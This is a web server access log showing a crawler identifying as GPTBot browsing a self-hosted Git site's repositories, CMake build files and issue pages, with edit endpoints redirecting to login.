"/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10652] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10300] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:19:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:17:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:17:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10736] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:17:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:17:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake" -[17/Feb/2026:17:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14319] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11346] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10004] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:19:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" -[17/Feb/2026:17:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm" -[17/Feb/2026:17:19:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" -[17/Feb/2026:17:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm" -[17/Feb/2026:17:19:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" -[17/Feb/2026:17:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm" -[17/Feb/2026:17:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11573] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" -[17/Feb/2026:17:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10262] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14599] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:17:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:17:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 11092] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" -[17/Feb/2026:17:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12462] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:17:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10676] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9828] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 907] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:17:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35736] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:17:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:17:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:17:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10923] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" -[17/Feb/2026:17:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10308] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" -[17/Feb/2026:17:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10637] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" -[17/Feb/2026:17:19:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:19:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" 